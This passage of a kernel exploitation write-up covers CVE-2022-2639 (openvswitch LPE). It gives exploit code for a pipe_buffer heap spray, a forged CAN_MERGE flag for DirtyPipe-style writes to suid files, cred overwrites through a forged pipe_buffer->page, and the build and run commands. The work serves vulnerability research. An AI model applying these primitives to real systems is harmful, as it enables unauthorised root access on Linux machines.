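(4) Spray pipe_buffer to reclaim the leaked kmalloc-1024 once more, so that sk_buff->data and pipe_buffer overlap. In the same step, open the target suid file and splice it into each pipe.

[Figure: 4-pipe_buffer-sk_buff]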

#define ATTACK_FILE "/usr/bin/mount"

// filled with pipe_buffer
logd("spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data");
int attack_fd = open(ATTACK_FILE, O_RDONLY);
if (attack_fd < 0) {
    die("open %s: %m", ATTACK_FILE);
}
for (int i = 0; i < NUM_PIPES; i++) {
    if (pipe(pipes[i])) {
        die("alloc pipe failed");
    }

    write(pipes[i][1], buff, 0x100 + i);

    loff_t offset = 1;
    ssize_t nbytes = splice(attack_fd, &offset, pipes[i][1], NULL, 1, 0);
    if (nbytes < 0) {
        die("splice() failed");
    }
}

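2-5. DirtyPipe-style exploitation

Method: reading sk_buff->data leaks the entire pipe_buffer structure and turns the bug into a pipe_buffer UAF. From here one can either leak pipe_buffer->ops to obtain the kernel base and build a ROP chain (control-flow hijacking), or switch to a DirtyPipe-like scenario (arbitrary file modification).

Principle: see https://github.com/veritas501/pipe-primitive for details. On kernel >= 5.8, it is enough to set flags |= PIPE_BUF_FLAG_CAN_MERGE on the pipe_buffer of the spliced page (if possible, also set offset and len to 0 so that writing starts at the beginning of the file). On kernel < 5.8, first leak anon_pipe_buf_ops from a pipe_buffer, then change the ops of the spliced page's pipe_buffer to anon_pipe_buf_ops, because before 5.8 mergeability is decided by ops (again, offset and len can be set to 0 if possible).

Advantage: the next write to the pipe then modifies the file's page cache, which gives the same arbitrary file write capability as DirtyPipe. For local privilege escalation it is enough to modify a suid program or /etc/passwd. No ROP adaptation is needed, so the technique is portable across versions.

// heap spray that forges the pipe_buffer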
logd("edit pipe_buffer->flags");
{
    memset(buff, 0, sizeof(buff));
    memcpy(buff, pipe_buffer_backup, sizeof(pipe_buffer_backup));
    struct typ_pipe_buffer *ptr = (struct typ_pipe_buffer *)buff;
    ptr[1].flags = PIPE_BUF_FLAG_CAN_MERGE; // for kernel >= 5.8
    ptr[1].len = 0;
    ptr[1].offset = 0;
    ptr[1].ops = ptr[0].ops; // for kernel < 5.8
    spray_skbuff_data(buff, 0x400 - 0x140);
    hexdump(buff, sizeof(struct typ_pipe_buffer) * 2);
}

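[Figure: 5-fake-pipe_buffer]

2-6. Test

The privilege escalation test looks like this:

[Figure: succeed]

3. Supplement

3-1. How DirtyPipe works

<=4.8: originally, mergeability was not tracked in pipe_buffer->flags but decided by the pipe_buf_operations->can_merge field. When splice was introduced, a new pipe_buf_operations came with it, struct pipe_buf_operations page_cache_pipe_buf_ops, whose can_merge field is 0. So there was no flag to set; pointing the ops pointer at page_cache_pipe_buf_ops was enough.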

const struct pipe_buf_operations page_cache_pipe_buf_ops = {
	.can_merge = 0,
	.confirm = page_cache_pipe_buf_confirm,
	.release = page_cache_pipe_buf_release,
	.steal = page_cache_pipe_buf_steal,
	.get = generic_pipe_buf_get,
};

4.9~5.0: commit 241699cd72a8 "new iov_iter flavour: pipe-backed" (Linux 4.9, 2016) introduced two functions, one of which is copy_page_to_iter_pipe(). It did not initialize pipe_buffer->flags either, but that was harmless because can_merge still lived in the ops.

5.0~5.8: commit 01e7187b4119 "pipe: stop using ->can_merge" (Linux 5.0, 2019) removed the can_merge field from pipe_buf_operations and added the function pipe_buf_can_merge(). Presumably the reasoning was that only anonymous pipes support merging, so checking whether ops is anon_pipe_buf_ops is enough to decide mergeability.

static bool pipe_buf_can_merge(struct pipe_buffer *buf)
{
	return buf->ops == &anon_pipe_buf_ops;
}

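5.8~5.16: commit f6dd975583bd "pipe: merge anon_pipe_buf*_ops" (Linux 5.8, 2020) moved the merge decision into pipe_buffer->flags, which led to the DirtyPipe vulnerability.

Exploitation: on kernel >= 5.8, it is enough to set flags |= PIPE_BUF_FLAG_CAN_MERGE on the pipe_buffer of the spliced page (if possible, also set offset and len to 0 so that writing starts at the beginning of the file). On kernel < 5.8, first leak anon_pipe_buf_ops from a pipe_buffer, then change the ops of the spliced page's pipe_buffer to anon_pipe_buf_ops, because before 5.8 mergeability is decided by ops (again, offset and len can be set to 0 if possible). Older kernels involve a kernel address, but no offset computation, so no per-version adaptation is needed there either.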
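
The three eras described above can be summarized in a toy user-space model. Everything prefixed with toy_ is invented for this illustration and is not kernel code; only the value of PIPE_BUF_FLAG_CAN_MERGE (0x10) is taken from the kernel headers. The model only shows which field decides mergeability in each era.

```c
#include <stdbool.h>

#define PIPE_BUF_FLAG_CAN_MERGE 0x10	/* value from include/linux/pipe_fs_i.h */

/* Toy stand-ins for pipe_buf_operations and pipe_buffer. */
struct toy_ops { int can_merge; };
struct toy_buf { const struct toy_ops *ops; unsigned int flags; };

static const struct toy_ops toy_anon_ops       = { .can_merge = 1 };
static const struct toy_ops toy_page_cache_ops = { .can_merge = 0 };

enum toy_era { TOY_BEFORE_5_0, TOY_5_0_TO_5_8, TOY_FROM_5_8 };

/* Which field decides whether a write may be appended to this buffer. */
static bool toy_can_merge(enum toy_era era, const struct toy_buf *buf)
{
	switch (era) {
	case TOY_BEFORE_5_0:	/* per-ops can_merge field */
		return buf->ops->can_merge != 0;
	case TOY_5_0_TO_5_8:	/* identity of the ops table */
		return buf->ops == &toy_anon_ops;
	default:		/* per-buffer flag, 5.8 and later */
		return (buf->flags & PIPE_BUF_FLAG_CAN_MERGE) != 0;
	}
}
```

A spliced page-cache buffer with a stale or forged CAN_MERGE flag is treated as mergeable only in the last era, which is why forging flags is sufficient from 5.8 on while older kernels require replacing ops.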

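3-2. Building arbitrary read/write with `pipe_buffer`

Overview: this section introduces a newer technique that forges pipe_buffer->page to obtain arbitrary read/write. It can read and write the physical address space, including the kernel, sensitive objects such as task_struct or cred, and the writable pages of the kernel image.

About pipe_buffer: a pipe is managed by a pipe_inode_info structure whose pipe_inode_info->bufs pointer refers to an array of pipe_buffer. The n (16 by default) pipe_buffer entries form a ring; pipe_inode_info->head and pipe_inode_info->tail mark the write and read positions respectively. The pipe_buffer array lives in a memcg slab cache and its allocation size is n * sizeof(struct pipe_buffer), where n is a power of two. As shown in CVE-2021-4154, n can be set with fcntl(pipe_fd, F_SETPIPE_SZ, PAGE_SIZE * n).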

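struct pipe_buffer {
	struct page *page;			// points to the struct page that describes a physical page; all struct page objects live in the array at `vmemmap_base`. On a pipe write the kernel stores the data in a new page, which can be spliced into other pipes or read back from the read end.
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;	// method table; overwriting it can be used to hijack control flow
	unsigned int flags;
	unsigned long private;
};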
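
As a small illustration of the F_SETPIPE_SZ call mentioned above, the sketch below resizes a pipe to n pages and computes the size of the resulting pipe_buffer array. The helper names are invented for this example, and the value 40 for sizeof(struct pipe_buffer) is an assumption based on the x86-64 layout of the struct shown above.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stddef.h>
#include <unistd.h>

/* Fallback in case <fcntl.h> was included earlier without _GNU_SOURCE;
 * these are the Linux-specific command numbers. */
#ifndef F_SETPIPE_SZ
#define F_SETPIPE_SZ 1031
#define F_GETPIPE_SZ 1032
#endif

/* Assumed sizeof(struct pipe_buffer) on x86-64: 8 + 4 + 4 + 8 + 4 (+4 pad) + 8. */
#define PIPE_BUFFER_SIZE 40

/* Ask the kernel for a pipe capacity of n pages; returns the capacity the
 * kernel reports afterwards in bytes, or -1 on error (hypothetical helper). */
static long resize_pipe_pages(int pipe_fd, long n)
{
	long page = sysconf(_SC_PAGESIZE);

	if (fcntl(pipe_fd, F_SETPIPE_SZ, page * n) < 0)
		return -1;
	return fcntl(pipe_fd, F_GETPIPE_SZ);
}

/* Bytes requested for the pipe_buffer array of an n-slot pipe. */
static size_t pipe_buffer_array_bytes(size_t n)
{
	return n * PIPE_BUFFER_SIZE;
}
```

Under these assumptions the default 16-slot pipe needs 16 * 40 = 640 bytes, which falls into the kmalloc-1024 size class used throughout the exploit.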

pipe_write(): on a write to a pipe, the kernel allocates a new page to hold the data; that page can be spliced or read from the read end.

static ssize_t pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	...
	for (;;) {
		...
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			...
			struct page *page = pipe->tmp_page;
			...
			if (!page) {
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);	// [1] allocate a new physical page
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}
			...
			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;					// [2] store the new page in pipe_buffer->page
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			...
			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);	// [3] copy the user data
			...
		}
		...
	}
	...
}

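Exploit idea: suppose we can overwrite pipe_buffer->page so that it points either into heap memory (the address of some heap object is known, so plain arithmetic suffices) or into the kernel image (the address of the target is unknown and has to be brute-forced).

3-2-1. Target object address known

Assumption: we can leak the address of some page, we know the address of the target object, and we want to tamper with that object. With a leaked struct page pointer we can compute vmemmap_base, compute where the heap base sits among the physical pages (the kernel heap also lives in physical pages; its base is unknown, but as explained below its offset from the first page is fixed), and repeatedly increment and rewrite the page pointer to find the target object on the heap.

Example: suppose the leaked struct page address is 0xffffebea044d9f00 and the target virtual address is 0xffff98784d431d00. Computing 0xfffffffff0000000 & 0xffffebea044d9f00 gives vmemmap_base = 0xffffebea00000000.

Question: how do we find the page that holds an object on the heap? struct page = vmemmap + offset, so what is this offset? Because the vmemmap array maps directly onto physical memory and the heap base is not fully (physically) randomized, the following formula gives the target object's page.

target_object page = vmemmap_base + ((0x100000000 >> 12) * 0x40) + (((target_object & 0xffffffff) >> 12) * 0x40)

Explanation: the heap base is not randomized; its offset relative to vmemmap_base is fixed at 0x100000000. Shifting right by 12 gives the index of the page in memory, e.g. 0x100000000 corresponds to page number 0x100000000 >> 12. Multiplying by 0x40 gives the byte offset within the vmemmap_base array (0x40 is the size of struct page), in the same way that for int x[N]; int y = x[3]; the element is read from byte address (char *)x + 3 * sizeof(int).

Once pipe_buffer->page is set, we can read and write the page that holds the target object. Note that the target object may span more than one page.

[Figure: 1-indexing the target object's page]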
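
The formula can be written down as plain C arithmetic, as a sketch under the assumptions stated in the text: a 0x40-byte struct page, 4 KiB pages, and the fixed 0x100000000 offset. The function names are invented for this illustration and are not the exploit's own virt_to_page().

```c
#include <stdint.h>

#define STRUCT_PAGE_SIZE 0x40ULL		/* sizeof(struct page), as stated in the text */
#define PAGE_SHIFT_4K    12			/* assumption: 4 KiB pages */
#define HEAP_PHYS_OFFSET 0x100000000ULL		/* fixed offset assumed by the text */

/* Recover vmemmap_base from a leaked struct page pointer by masking
 * off the low 28 bits, as in the worked example. */
static uint64_t vmemmap_base_from_leak(uint64_t leaked_page)
{
	return leaked_page & 0xfffffffff0000000ULL;
}

/* Address of the struct page entry that describes the page holding
 * `target`, following the formula above term by term. */
static uint64_t page_for_object(uint64_t vmemmap_base, uint64_t target)
{
	return vmemmap_base
	     + (HEAP_PHYS_OFFSET >> PAGE_SHIFT_4K) * STRUCT_PAGE_SIZE
	     + ((target & 0xffffffffULL) >> PAGE_SHIFT_4K) * STRUCT_PAGE_SIZE;
}
```

With the example values, the leak 0xffffebea044d9f00 yields the base 0xffffebea00000000, and the target 0xffff98784d431d00 maps to the struct page at 0xffffebea05350c40.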

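Code: the following code points pipe_buffer->page at the page that holds the current task's cred object (assuming the address of the cred object is known) and overwrites it with zeros to escalate privileges.

uint64_t cred_page = virt_to_page(target_obj, vbase); 			// virt_to_page() implements the formula above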
uint64_t cred_off = (target_obj & 0xfff); 
 
pbuf->page = (long *)cred_page; 
pbuf->offset = cred_off + 0x4; 
pbuf->len = 0; 
pbuf->ops = (long *)FAKE_OPS; 
pbuf->flags = PIPE_BUF_FLAG_CAN_MERGE; 
pbuf->private = 0; 
... 
write(dest_pipe.wr, zeroes, 0x20); 

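3-2-2. Target object address unknown

Assumption: the address of the target object is unknown, so task_struct and cred have to be located first. We can use prctl() to set the current task's task_struct->comm to a distinctive string, which makes it easy to search for.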
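
Setting comm is an ordinary prctl() call. The sketch below shows it with PR_SET_NAME and reads the value back with PR_GET_NAME; the helper names and the marker string in the usage note are made up for this example.

```c
#include <sys/prctl.h>

/* Set the calling thread's name (task_struct->comm) to `tag`.
 * The kernel keeps at most 15 characters plus the terminating NUL.
 * Returns 0 on success (hypothetical helper). */
static int set_comm_marker(const char *tag)
{
	return prctl(PR_SET_NAME, (unsigned long)tag, 0, 0, 0);
}

/* Read the current name back into `out`, which must hold 16 bytes.
 * Returns 0 on success (hypothetical helper). */
static int get_comm(char out[16])
{
	return prctl(PR_GET_NAME, (unsigned long)out, 0, 0, 0);
}
```

After set_comm_marker("hypo-marker"), get_comm() returns the same string, which is the byte pattern a later memory search would look for.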

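Method: iterate over i, setting pipe_buffer->page to (vmemmap_base + ((0x100000000 >> 12) * 0x40)) + (0x40 * i) and reading memory until the current task's task_struct is found, which discloses the cred address. This requires triggering the bug and re-spraying the forged pipe_buffer many times.

Avoiding reallocation: suppose we know the address of some object, but not of the target object. For example, we know the address of the overlapping msg_msgseg and pipe_buffer, but not the address of the target cred object. We can use an overwrite pipe_buffer to rewrite a seeker pipe_buffer repeatedly:

(1) compute the address of the page that holds the seeker pipe_buffer;
(2) create another pipe_buffer, the overwrite pipe_buffer;
(3) trigger the UAF and write to the page in which the seeker pipe_buffer->page is located;
(4) call tee() with the seeker pipe as source and the overwrite pipe as destination.

We now have a reliable way to overwrite the seeker pipe_buffer without repeated spraying and UAF triggering. The code is as follows: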

void set_new_pipe_bufs_overwrite(char *buf, struct pipe_struct *overwrite, 
                                 char *obj_in_page, struct pipe_buffer *pbuf, 
                                 uint64_t new_page, uint32_t len, int *tail) 
{ 
    if(read(overwrite->read, buf, PAGE_SIZE) != PAGE_SIZE) 		// [1] read() makes the overwriter's pipe_inode_info->tmp_page point at the page that holds the seeker `pipe_buffer`; afterwards we can write straight into that tmp_page
        error_out("read overwriter_pipe[0]"); 
 
    struct pipe_buffer *setpbuf = (struct pipe_buffer *) obj_in_page; 	// [2] build the new `pipe_buffer`
    setpbuf += (*tail) % 8; 
    (*tail)++;
    *setpbuf = *pbuf;
    setpbuf->page = (void *) new_page; 
    setpbuf->len = len; 
 
    if (write(overwrite->write, buf, PAGE_SIZE) != PAGE_SIZE) 	// [3] write to the seeker `pipe_buffer` through the overwrite pipe; the kernel stores the data in the physical page referenced by the overwrite pipe's pipe_inode_info->tmp_page
        error_out("write overwriter_pipe[1]"); 
} 

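Reading and writing kernel variables directly? Suppose the target is a variable inside the kernel. For example, instead of scanning the heap, we would like to walk from init_task to the current task and its cred object. Can we leak the kernel base (e.g. via pipe_buffer->ops) and then apply the virt_to_page() formula, i.e. compute the page index from the kernel base and forge pipe_buffer->page for an arbitrary read?

With KASLR enabled on x86 this does not work. CONFIG_RANDOMIZE_BASE randomizes the physical load address and the virtual base address independently, so one cannot be derived from the other.

3-3. Common debugging commands

# ssh connection and test
$ ssh -p 10021 hi@localhost             # password: lol
$ ./exploit

# Build the exploit. Note: libmnl cannot be linked statically, so -static fails when it is used; -lrt links the realtime library
$ gcc exploit.c -o exploit -static -no-pie -s

# copy files with scp
$ scp -P 10021 ./exploit hi@localhost:/home/hi      # upload a file
$ scp -P 10021 hi@localhost:/home/hi/trace.txt ./   # download a file
$ scp -P 10021 ./exploit.c ./get_root.c ./exploit ./get_root  hi@localhost:/home/hi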

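References

CVE-2022-2639 openvswitch LPE vulnerability analysis

CVE-2022-0185 analysis and exploitation, with thoughts on and practice of the new pipe primitive

[kernel exploit] CVE-2022-0847 Dirty Pipe vulnerability analysis and exploitation

pipe_buffer arbitrary read write: arbitrary address read/write using pipe_buffer

Document information

Author: bsauce
Link: https://bsauce.github.io/2022/11/24/CVE-2022-2639/
License: free to share, non-commercial, no derivatives, attribution required (Creative Commons 3.0 license)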
